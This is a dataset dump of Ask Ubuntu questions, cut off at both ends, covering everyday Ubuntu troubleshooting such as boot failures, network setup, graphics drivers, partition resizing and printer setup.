firewire_core r8169 67581 0 mii 13934 1 r8169 pata_jmicron 12758 0 ahci 25819 0 libahci 32009 1 ahci floppy 69370 0 after the user logs in and i run the same program . # state after loggin in to lightdm and starting the desktop environment # hari @ hjubuntu : ~ $ ~/opencl-program available device list : type : cpu , 'intel ( r ) core ( tm ) 2 quad cpu q9450 @ 2.66ghz' type : gpu , 'pitcairn' type : accelerator , 'pitcairn' now if i do a diff of the lsmod what i get is hari @ hjubuntu : ~ $ diff before_login after_login | grep fglrx < fglrx 8815330 48 < amd_iommu_v2 19054 1 fglrx > fglrx 8815330 44 > amd_iommu_v2 19054 1 fglrx so logging in caused the fglrx driver to get used by `` 44 '' . how do i mimic this so i got have to log in when someone remote-power cycles this machine ? . edit : i am trying to implement the script below and always get a '' hari @ hjubuntu : ~ $ xauth extract `` $ display '' xauth : ( argv ) :1 : bad `` extract '' command line '' the $ display environment label is blank hari @ hjubuntu : ~ $ echo $ display xauth list gives hjubuntu/unix:1 mit-magic-cookie-1 8562e9f6ac976f310d1425aa11e74184 hjubuntu:0 mit-magic-cookie-1 80f5f4c28e7e2d0fc9444b1862f5cbcb hjubuntu:0 mit-magic-cookie-1 80f5f4c28e7e2d0fc9444b1862f5cbcb hjubuntu/unix:13 mit-magic-cookie-1 142c11b5689f4bd2776e860b9d8719dd hjubuntu/unix:14 mit-magic-cookie-1 08353f652f21b479a6da3a60282bce31 hjubuntu/unix:15 mit-magic-cookie-1 655d074dfb395f536283e70a9494428c hjubuntu/unix:12 mit-magic-cookie-1 91387509c2dff960e295fdd0eb0ada52 hjubuntu/unix:11 mit-magic-cookie-1 914c7988660149b90eed958066ed2e71 hjubuntu/unix:10 mit-magic-cookie-1 0ab65dbaf838a08bd8c9141fb5da7c35 wondering how i should proceed .
480672	getting interleaved source code and assembly code for shared object files in ubuntu	i would like to get interleaved source code and assembly code for a number of .so shared objects using `` objdump -s '' command . however , it seems that the installed libraries on my machine do not include debugging symbols ( or dwarf info ) . is there any way to include debugging info . into these .so files ?
480673	ubuntu wo n't boot from usb - windows 8 - non dual boot related	i 'm trying to replace windows 8.1 with ubuntu . i understand there are dual boot issues . i would like to completely replace windows . i have created a usb installer as directed , but can not get it to boot . only windows boot menu appears on the boot menu . i attempted to change the bios to legacy , but the only option is uefi . my computer is packard bell easynotete69bm
480674	problem in installing ubuntu 14.04 inside windows 7	normally wubi.exe does not show option install ubuntu inside windows , i used command line in dos wubi.exe -- force wubi then it shows install ubuntu inside windows . but after copying all files when computer restarts for installing ubuntu it shows error no root file system is defined , please correct this from partitioning menu . what did i do wrong ?
480675	ubuntu connects to wireless but does n't work !	i just installed ubuntu 14.04 lts on my laptop , it connects to my wireless network and shows that it is connected , but when i try to load a webpage or do anything like download steam for dota 2 , it does n't work . when i try to connect my facebook account to ubuntu , it does n't work . i want to be able to use ubuntu with working internet access . what do i do ? . ifconfig this shows up eth0 link encap : ethernet hwaddr 88 : ae:1d:60:56 : eb inet addr:192.168.1.13 bcast:192.168.1.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:24 errors:0 dropped:0 overruns:0 frame:0 tx packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1856 ( 1.8 kb ) tx bytes:1856 ( 1.8 kb ) when i type ping askubuntu.com this shows up ping : unknown host askubuntu.com
480676	problem expanding ubuntu partition	i have 50 gbs of unallocated space on my hard drive and i want to expand my ubuntu partition to fill that space ; however , when i run gparted in a live version of ubuntu and turn the swap off , it only allows my to expand my windows partition into the free space but wo n't let me do the same with the ubuntu partition . any idea as to how i can fix this ?
480682	trouble with graphics settings	i recently tried to install ubuntu 14 lts alongside windows xp pro on my 2005 dell dimension e510 . everything appeared to be working correctly until i tried to log in , at which point it froze with a blank color background , which would flicker to black every other time i hit a key or clicked the mouse . i then tried booting in graphical safe mode at which point it told me that it could not configure the graphics settings . does any body know what 's going on . thank you for any suggestions . i 'm updating this because i managed to get it to load up and work [ i have no idea how ] , that 's the good news , the bad news is the display is still screwed up ; with the top menu appearing to be over large in the horizontal and the entire display appearing to be shifted downward with a black gap at the top . update 06/09/14 8:46 pm it appears to only want to load if i boot from the recovery menu .
480683	unable to ping inside or outside network with default gateway 0.0.0.0	i 've been around here before and i could usually piece together everything to more or less get myself up and running , but this time i 'm truly stumped . i 'm trying to connect my new 14.04 install to a network , and i 'm forced to be behind my college 's router . now i 've tested the vary cable that is right now plugged into my ubuntu box on a windows , mac os x , and even my friend 's ubuntu 14.04 box , and they all connect no problem . i 've been trying to track this down for about two days , but every time i get close to it , the bug jumps to some other piece of my connection . anyway , as it sits ifconfig -a gives : eth2 lninkencap : ethernet hwaddr:00:1f : bc:08:31:1d inet addr:10.32.51.51 bcast:10.32.51.155 mask : 255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 rx bytes:0 tx bytes:0 as well as the local loopback , but i 'm assuming that is not an issue here . sudo dhclient -v eth2 returns : listening on lpf/ < hardware address of my integrated nic , above > sending on < same > sending on socket/fallback dhcprequest of 10.32.51.51 on eth2 to 255.255.255.255 port 67 ( xid=0x6f4a66ba ) < two more lines of same > dhcpdiscover on eth2 to 255.255.255.255 port 67 interval 3 ( xid=0x156f9fb4 ) < many more of above with varying intervals > no dhcpoffers received . trying recorded lease 10.32.51.51 rtnetlink answers : file exists bound : renewal in < large number > seconds if i then try ping 8.8.8.8 , i get : connect : network is unreachable /etc/resolv.conf only contains the two lines telling you not to edit it , while /etc/network/interfaces only has the loopback interface block in it . i 've tried commenting out the `` option rfc3442 '' line in /etc/dhcp/dhclient.conf which seemed to fix this issue for many people , as well as adding the line send vendor-class-indentifier `` msft5.0 '' to dhclient.conf as well to tell the router i 'm a windows box , in case they do n't like linux . finally , route -n reveals : destination gateway genmask flags metric ref use iface 10.32.51.0 0.0.0.0 255.255.255.0 u 0 0 0 eth2 i would like to apologize in advance for the doubtless butchered text alignment , but i 'm obviously typing this all by hand , reading from the terminal as i type commands . i 'm hoping this is an interesting problem , and not something i blithely stumbled past in my ( apparent ) over-confidence . tia ! quick addendum before posting : the activity light on the ethernet port are lit and one blinks during boot , but they rarely ( and seemingly randomly ) do so afterwards ( both are dark ) even while running dhclient in the foreground . when i had the ubuntu box tethered to my macbook earlier , i got what looked like a normal power/uplink blinking pattern , but was unable to ping one from the other .
480687	latest ( 5 june 14 ) updates t0 10.04 causing multiple problems	apologies , the questions are very short , but the bkg is n't . i rec 'd a routine notification from the update mgr a few days ago ( i believe , june 5th ) . i took a look and there was lots of linux stuff , headers , etc. , nothing obviously unusual . i 'd rec 'd and updated w/a more extensive pkg set , kernel and all a few weeks ago , no problem . on june 6 , i pushed the upgrade button on the june 5th batch , nothing usual , needed a reboot , which i did after a full power down , it came up fine . gedit worked , the calculator worked , started up firefox , it came up , selected the bookmarks menu , and blam , it hesitated and then greyed out , when i tried to close it , got the `` process not responding '' msg . undaunted , i tried to fire up google chrome ... .nothing on the screen or process bar . i fired up the system monitor and indeed there were some `` sleeping '' chrome processes `` running '' . powered down several times , but the same problems persist . similar but worse story when i tried to fire up one of my virtual machines , virtualbox came up fine , but when i tried to start one of my virtual machines i got a progress popup that i 'd never seen before which showed that we were making no progress past 20 % . uninstalled oracle virtualbox , reinstalled the latest and greatest , same result . also , unable to logout , or shutdown once the virtual machine exhibited this behavior . powered down manually , end of story . never saw such a bad result after an update . i 'm running ubuntu 10.04 lts ( lucid lynx ) as i have been for a number of years . please do n't reply with why do n't you run some other version of ubuntu , that does n't answer the questions below . questions : will their be a subsequent update that fixes this , and if so , when ? if not , is there a way for me to get back to where i was before this disaster ?
480689	ca n't sync music on nexus 4 with rhythmbox	my lg nexus 4 phone running andriod 4.4.3 will not sync music with rhythmbox , banshee , or clementine with my laptop running ubuntu 14.04 . when attached via usb2 or usb3 i can mount the file system on the phone without issue and can manually transfer files but attempting to sync my nexus with any of the three music players i listed causes them to crash . i realize it is probably some mtp issue . but i can not figure out why the music players can not connect to my nexus and nautilus has no problem doing so .
480690	resize hard drive partition to make more space for /var	i am running out of space in the /var partition . i have plenty of space in my /home partition . how do i shrink the /home partition to make more space for the /var partition ? i have read some blogs that say to use the gparted live cd . as a new user , i 'm not quite sure if this is the ideal route . what is the best way to create more space for /var ? output of df -h : filesystem size used avail use % mounted on /dev/sda2 19g 7.1g 11g 41 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 7.9g 8.0k 7.9g 1 % /dev tmpfs 1.6g 1.5m 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.9g 624k 7.9g 1 % /run/shm none 100m 60k 100m 1 % /run/user /dev/sda4 454m 75m 352m 18 % /boot /dev/sda5 2.3g 2.1g 36m 99 % /var /dev/sda3 178g 1.3g 168g 1 % /home /dev/sda6 2.8g 5.8m 2.6g 1 % /tmp /dev/sdb1 3.7t 401g 3.3t 11 % /hdd
480691	how to change the system color from orange in 14.04 lts ?	can i change the `` orange '' of ubuntu ? for example , i want to change : the folders ; the button highlights when you hover over them ; the buttons too .
480695	installing disastry 's pgp 2.6.3ia multi06 on 12.04 lts	how can i install disastry 's version of pgp 2.6.3ia-multi06 on ubuntu 12.04 lts ? his site with the source code is here : http : //www.spywarewarrior.com/uiuc/disastry/263multi.htm he already compiled a unix version of pgp and it 's in the linux section of his download . how can i either copy and install the binary pgp file , or compile it from the source and install . i have tried several different ways , get no error messages , but when i type pgp -h at the command line , ubuntu tells me that pgp is not installed . ( i already have truecrypt 7.1a and gnupg 1.4.16 installed , but still like the old pgp i have on windows ) thanks ! traveler
480701	reduce boot time between grub menu and login screen	i use ubuntu 14.04 lts version which used to boot fast at beginning but not i loads very slow . i searched for this but ca n't find suitable answers . so i want to reduce my boot time which is now around 1min 12sec ( boot chart ) overall but i noticed its taking a longtime after grub menu and before login screen . a blank screen appears after grub waiting ... then login screen appears . i want to know a way to reduce that blank screen time ( or if possible remove ) and get login screen as fast as possible . i already removed several of my startup applications . getting desktop after log-in is fast . i do n't want to remove unity and install light desktop envinorments like xfce and lxde . thanks in advance edit : present i am using e4rat but that too did not save any time . i uninstalled ureadahead ubuntu-minimal packages to install e4rat . my recent boot-chart image i use a hdd hard disk ( i do n't want to buy a ssd ) my system configuration hp pavilion dv6 3127tx , 3gb ram . i3 processor , 320gb sata harddisk , 1gb ati mobility radeon hd graphic card and intel graphics , total boot time 50sec to 1min ( above , it changes at every boot ) .
480702	problems installing newer software because older software is having problems ... ubuntu 14.04	when i open the ubuntu software center i get a message that says that newer software cant be installed because there is a problem with the software currently installed there is a repair command but it doesnât work at all ! what can i do ?
480704	what do i do with the iso of 14.04 and 13.10 to use ubuntu on my windows 7 computer ?	what do i do with the iso ? i did install with wubi last year but now i have a new computer .
480707	rtl8192ce weak wifi signal hp pavilion dv6c35	just installed ubuntu 14.04lts on my hp dv6c35 laptop . i recently installed the wireless driver from the realtek website because i felt the stock driver wasnât doing me justice . well now after a bit of playing around with this driver as far as making sure it loads when my computer boots up there 's another problem that i need to address . on windows , my wifi signal is maximum at all times but on ubuntu 14.04 it 's staying at 2 bars 18mb/s according to the connection info . does anyone know if and how i can boost the power of my wifi ? i 'm still a bit new to linux but i know my way around computers and scripts to make it easier would be awesome .
480708	wifi internet is not working in ubuntu 12.04 64 bit	my internet works properly for windows . when i switch to ubuntu through vmware the internet is not working . i have also installed virtualbox , but there internet is working without any issues . i am attaching ifconfig and the wireless setting of my ubuntu . auto lo iface lo inet loopback hduser @ emani-virtual-machine : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:0c:29 : a7:29:8f inet6 addr : fe80 : :20c:29ff : fea7:298f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:29 errors:0 dropped:0 overruns:0 frame:0 tx packets:957 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2604 ( 2.6 kb ) tx bytes:220435 ( 220.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:484 errors:0 dropped:0 overruns:0 frame:0 tx packets:484 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:39392 ( 39.3 kb ) tx bytes:39392 ( 39.3 kb ) # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise # # # # # kernel # # # # # linux emani-virtual-machine 3.2.0-29-generic-pae # 46-ubuntu smp fri jul 27 17:25:43 utc 2012 i686 i686 i386 gnu/linux # # # # # lspci # # # # # 02:01.0 ethernet controller [ 0200 ] : intel corporation 82545em gigabit ethernet controller ( copper ) [ 8086:100f ] ( rev 01 ) subsystem : vmware pro/1000 mt single port adapter [ 15ad:0750 ] kernel driver in use : e1000 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface # # # # # resolv.conf # # # # # # # # # # nm-tool # # # # # networkmanager tool state : connecting - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000 state : connecting ( getting ip configuration ) default : no hw address : < mac address removed > capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile dns=dnsmasq no-auto-default= < mac address removed > , [ ifupdown ] managed=false lp # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac # # # # # # # # # # wireless info end # # # # # # # # # # # #
480711	trouble with printer canon lbp2900-ubuntu 14.04	i use ubuntu 14.04 . i installed the printer canon lbp2900 following the guide and did all steps and now the printer works . i added ccpd in startup application ( with command : sudo /etc/init.d/ccpd start ) . but after i log out or restart my pc , the printer ca n't print until i have to open terminal and run sudo /etc/init.d/ccpd restart & & sudo /etc/init.d/cups restart once more , after restarting my pc iâve just only printed 1 job ( of course it ca n't print ) , and i run sudo /etc/init.d/ccpd restart & & sudo /etc/init.d/cups restart the printer will work but it prints the same job three times .
480714	how to go back to saucy from trusty without loosing data	i have many many problems with trusty and its hard to find solution to them because i donâ´t always find help here , so how can i go back to saucy without loosing my data ?
480715	how to reset password in ubuntu 13.10	i wanted to reset password so i followed these steps : advance options in grub recovery mode root - > drop to root shell prompt but i can not enter password ( username ) and blah blah blah , because i am asked to enter root password .
480723	how to downgrade apache 2.4 to 2.2	is there any way to downgrade the apache version that installed in ubuntu 14.04 . some packages are not working in 2.4 apache . so we decide to downgrade to the stable apache version
480727	list ( head ) packages available from specific ppa by command-line	i want to list all head packages available from specific ppa . example : webupd8 ppa : nilarimogard/webupd8 has following head packages for trusty : can i list them by command-line ?
480728	sd card is not detecting in dev folder	my sd card is not detected in my ubuntu 14.04 but when i put it in a usb sd card reader , it is seen . dmesg [ 1782.222774 ] usb 3-9 : new high-speed usb device number 126 using xhci_hcd [ 1782.248469 ] usb 3-9 : new usb device found , idvendor=0bda , idproduct=0177 [ 1782.248478 ] usb 3-9 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1782.248484 ] usb 3-9 : product : usb2.0-crw [ 1782.248489 ] usb 3-9 : manufacturer : generic [ 1782.248493 ] usb 3-9 : serialnumber : 20121112761000000 [ 1782.252063 ] usb-storage 3-9:1.0 : usb mass storage device detected [ 1782.252128 ] scsi15 : usb-storage 3-9:1.0 [ 1783.253696 ] scsi 15:0:0:0 : direct-access generic- sd/mmc/ms pro 1.00 pq : 0 ansi : 4 [ 1783.254270 ] sd 15:0:0:0 : attached scsi generic sg2 type 0 [ 1783.261706 ] sd 15:0:0:0 : [ sdb ] attached scsi removable disk [ 1784.817562 ] usb 3-9 : usb disconnect , device number 126 there is only sda , which is my harddrive /dev/sda /dev/sda11 /dev/sda14 /dev/sda4 /dev/sda7 /dev/sda1 /dev/sda12 /dev/sda2 /dev/sda5 /dev/sda8 /dev/sda10 /dev/sda13 /dev/sda3 /dev/sda6 /dev/sda9 where is my sd card and how do i find it ?
480729	ubuntu 14.04 terminal up/down arrow special char issue	today when i opened terminal and typed ↑ ( up ) / ↓ ( down ) arrow key to get the previous run commands , to my horror i am getting special characters all over the terminal screen . even when i typed ctrl+shift+r and typed tried accessing the history commands , i am getting the special chars only . how do i resolve this ?
480731	ubuntu never boot from the first time	i have dual boot with windows 8 , some times when turn the laptop on and choose to boot ubuntu from the grub it just give me blank screen without any thing and it still in blank till i turn it off and reboot ubuntu again why some times when booting my ubuntu machine it does n't boot after loading the grub till i switch off and reboot again ?
480732	how can i recover gnome , gnome classic and gnome classic ( no effects ) session ?	i delete gnome , gnome classic and gnome classic ( no effects ) from cd /usr/share/xsessions with `` rm gnome-shell-desktop '' and `` rm gnome.desktop '' . how can i recover them ? /usr/share/xsessions $ ls ubuntu-2d.desktop ubuntu.desktop i followed this tutorial : how to remove session entries from lightdm ?
480734	how to add a runonce startup script ?	i 'd like to add a runonce start-up script on ubuntu which is expected to be run after the network interfaces have been initialized and before any user logs in . so which is the appropriate place to do that ?
480738	how to execute a `` name.desktop '' file ?	# ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=link name=sharefolder icon=/usr/share/icons/dpl/networkshare.png name [ en_us ] =sharefolder url=smb : //servername/sharefolder this is my .desktop file which has a url . how do i execute this desktop shortcut in the terminal ? if i double click it works perfectly , but i need to execute this in terminal . i tried running a .desktop file in the terminal . that did n't work for me either but it does if its an `` application '' shortcut . i 'm trying here to execute `` link '' .desktop file , where you define in the type section ( type=link ) and ( url=smb : //servername/sharefolder )
480740	resetting unity theme does n't stick	ubuntu 14.04 i have ambiance theme applied , but font colors are not following the theme . font colors are black , which is very hard to read on the dark background . for example , the font in the switch user/logout menu , or the font colors in the application menu . i have tried dconf reset -f /org/compiz/ setsid unity and this changes the font colors . but when i logout and login again , i 'm back to the black text .
480741	ubuntu 14.04 plymouth need press key	my ubuntu 14.04 stuck on plymouth . even i try to wait 1 hour and more ... it always need to press enter or space or some other key to get to login screen ... how can get back to normal start up , automaticly from press power button to login screen ! ?
480743	how to install softwares without internet or terminal	the main problem i saw in ubuntu is the difficulty of installing software , many peoples are lazy to work with terminal , isnt there any way to install softwares without internet or terminal , like in windows ?
480745	vmware player xorg driver broke after ubuntu 12.04 lts automatic system update on 06/07/2014	i am running ubuntu 12.04 lts as a virtual machine on a windows 7 host using vmware player 6.0.2 . on sat . 06/07/2014 , ubuntu performed an automatic system update as it does regularly , however after reboot , the display driver seems to be broken which causes the screen to split into many identical panels . this pretty much rendered the vm unusable . below is the log entry for that update from /var/log/apt/history.log it appears that at least one of these updates have caused this problem . the exact same problem has been reported on the vmware forum as well , see https : //communities.vmware.com/message/2388776 # 2388776 so far i have not been able so find a solution . content in /var/log/apt/history.log start-date : 2014-06-07 15:04:46 commandline : aptdaemon role='role-commit-packages ' sender=':1.65' install : linux-headers-3.2.0-64 : amd64 ( 3.2.0-64.97 ) , linux-image-3.2.0-64-generic : amd64 ( 3.2.0-64.97 ) , linux-headers-3.2.0-64-generic : amd64 ( 3.2.0-64.97 ) upgrade : iproute : amd64 ( 20111117-1ubuntu2.1 , 20111117-1ubuntu2.3 ) , libknewstuff3-4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkdeclarative5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libnepomukquery4a : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libgnutls-openssl27 : amd64 ( 2.12.14-5ubuntu3.7 , 2.12.14-5ubuntu3.8 ) , libthreadweaver4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkdecore5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libnepomukutils4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libktexteditor4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , linux-generic : amd64 ( 3.2.0.63.75 , 3.2.0.64.76 ) , libkmediaplayer4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkrosscore4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libgnutls26 : amd64 ( 2.12.14-5ubuntu3.7 , 2.12.14-5ubuntu3.8 ) , libgnutls26 : i386 ( 2.12.14-5ubuntu3.7 , 2.12.14-5ubuntu3.8 ) , libsolid4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libnepomuk4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkdnssd4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkparts4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , kdoctools : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libssl-dev : amd64 ( 1.0.1-4ubuntu5.13 , 1.0.1-4ubuntu5.14 ) , libssl-doc : amd64 ( 1.0.1-4ubuntu5.13 , 1.0.1-4ubuntu5.14 ) , libkidletime4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , linux-headers-generic : amd64 ( 3.2.0.63.75 , 3.2.0.64.76 ) , linux-image-generic : amd64 ( 3.2.0.63.75 , 3.2.0.64.76 ) , libkcmutils4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkfile4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkpty4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkntlm4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libplasma3 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkemoticons4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , kdelibs-bin : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkdewebkit5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkjsembed4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkio5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkjsapi4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , openssl : amd64 ( 1.0.1-4ubuntu5.13 , 1.0.1-4ubuntu5.14 ) , kdelibs5-data : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , linux-libc-dev : amd64 ( 3.2.0-63.95 , 3.2.0-64.97 ) , libkde3support4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libknotifyconfig4 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , kdelibs5-plugins : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkhtml5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkdeui5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libkdesu5 : amd64 ( 4.8.5-0ubuntu0.2 , 4.8.5-0ubuntu0.3 ) , libssl1.0.0 : amd64 ( 1.0.1-4ubuntu5.13 , 1.0.1-4ubuntu5.14 ) , libssl1.0.0 : i386 ( 1.0.1-4ubuntu5.13 , 1.0.1-4ubuntu5.14 ) end-date : 2014-06-07 15:09:08
480746	change default username to root on beagleboard xm	i am running ubuntu on beagleboard xm . the default username and password are 'ubuntu ' and 'temppwd ' respectively . i wanted to know how can i change the default user to 'root ' and password accordingly ?
480753	remove evolution-calendar-factory from startup	is there a way of removing it from startup ? i do n't need it and i 'm not using evolution at all .
480758	ubuntu 12.04 screen issue after updating	i have ubuntu installed on vmware player . after installing the last updates the screen went like this image : as you see i have not real second menu ( it is not clickable ) why did this happen and how to fix ?
480760	i reinstalled ubuntu and while downloading chrome i am getting `` error : dependency is not satisfiable : libasound2 ( > > 1.0.23 ) : ''	due to this error i am not able to i install chrome in my system . please help me ! output of apt-cache policy libasound2 libasound2 : installed : 1.0.27.2-3ubuntu7 candidate : 1.0.27.2-3ubuntu7 version table : ** 1.0.27.2-3ubuntu7 0 500 http : //in.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status now getting one more error from software center the system package is broken
480762	is it possible to make gnome shell open with the activities overview ?	when booting in to gnome shell , the first thing i do is open the activities overview . there is a perceptible delay before it opens for the first time which is no big deal , but bugs me nevertheless . any subsequent opening of the activities overview is instantaneous . is there any way to boot straight in to the activities overview , to rid me of this windowsesque little niggle ?
480764	no result in dash for music , photo and video	i have no results for music , photo and video in dash . app search works well . maybe it because language of my system is russian ? ubuntu 14.04
480766	how to desable access for `` networkinh ''	how to disable accessing `` edit connections '' for standard users , only for administrator user .
480767	which ubuntu version suits best my laptop 's configuration ?	dell laptop configurations are : - model- dell inspiron 1525 processor- intel core 2 duo 2.0 ghz , ram- 3gb
480769	wrong zoom in/out behavior touchpad move	scenario : being in browser , i drag the touchpad using two fingers - > page scroll while the page is scrolling ( my fingers are not on touchpad anymore ) , i press ctrl key . the page is zoomed in/out same issue appears in nautilus , for example . how can this be fixed ?
480770	how to install dolphin fm in ubuntu 12.04	i 'm absolutely new to linux . i even do n't know what 's kde and what 's gnome . i installed ubuntu 12.04 ( 64 bit ) in my laptop . i want to install dolphin file manager and ( if possible ) make it default . i read everywhere terminal command sudo apt-get install dolphin installs dolphin . but in my case , it 's giving me an error . here is the output of the terminal : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : dolphin : depends : kde-runtime but it is not going to be installed e : unable to correct problems , you have held broken packages . any help will be appreciated .
480776	fat partition seems readonly - but not always	i 'm trying to delete data from an external fat drive , which in the past worked . now , after some system updates , it seems to be stuck in read-only mode -- although i ca n't figure out why . the mount entry is /dev/sdc1 on /media/extern type vfat ( rw ) ls -al /media/extern shows entries like drwxr-xr-x 76 root root 32768 jan 21 2012 mg drwxr-xr-x 22 root root 32768 feb 28 2013 music as far as i know , i should with this configuration be able to sudo rm -r /media/extern/foobar . however , doing this always gives me rm : can not remove â/media/extern/foobarâ : read-only file system and this is just in the simplest possible mount setting , with mount /dev/sdc1 -t vfat -o rw /media/extern . even stranger , with my usual fstab setting , uuid=0031-f0ca /media/extern vfat exec , auto , user , users , rw , shortname=mixed , umask=000 , uid=1000 , gid=1000 0 0 ( which is mostly copy-pasta and trial & error , but worked in the past ) , it gets listed in mount as /dev/sdc1 on /media/extern type vfat ( rw , noexec , nosuid , nodev , shortname=mixed , umask=000 , uid=1000 , gid=1000 ) but i still am not able to change anything ( same messages ) -- however , it must be possible somehow , since back in time ( internally run by a chronjob ) has actually written backups to the drive ! although its auto-removal of old backups does n't work , too ... which made me recognize the issue in the first place , since the drive just got full . this made me suspicious that this is a permission problem , but trying sudo chown gave me the same error message as above . the drive was previously used for backups of the system before i reinstalled ubuntu , so there are , for example , full copies of the old /home folders . at first i thought that this might have to do with the issue , but i am not even able to modify folders other than those . and then , if i understood that correctly , vfat is not even able to manage permissions in unix fashion ... any ideas what 's wrong here ? or is it just my misunderstanding of anything ?
480777	how to change password requirements ?	i tried to change my ubuntu password but it keeps saying my new password is not `` good enough '' even when it passes my company security requirements : at least 8 characrters at least one number at least one uppercase letter i know , i could use better , stronger and nicer password , but , i want my ubuntu follow the requirements from my company . how can i force ubuntu to let me change my password ?
480778	hdmi video output not working for external monitor	i have installed from scratch ubuntu gnome 14.04 with gnome-flashback on my old hp hdx 16 laptop ( core 2 duo p8600 + nvidia gt9600m + 4gb of ram ) and i have problems with the hdmi output ( i use it to extend my desktop on a dell u2412m 1920x1200 monitor ) . in the following i summarize the configurations that i have tried : using the open source nouveau drivers , only the laptop monitor works , no signal from the external monitor connected to the hdmi output . however , the output of the xrandr command show that the hdmi output is connected with the correct resolution 1920x1200 ( i find this thing really weird ) . nouveau drivers with vga connection works without problems on the external monitor , but the image is blurry compared to the hdmi connection . using the nvidia drivers ( i have tried different versions : nvidia-331-updates and the xorg-edgers versions nvidia-334 and nvidia-337 ) the hdmi output works , but i have system instabilities , random crashes and display freezes . i ca n't even enter in terminal mode with ctrl-alt-f1 , so i have to manually shut down the laptop with the power button . i really would like to use the hdmi output with the nouveau drivers to avoid the system 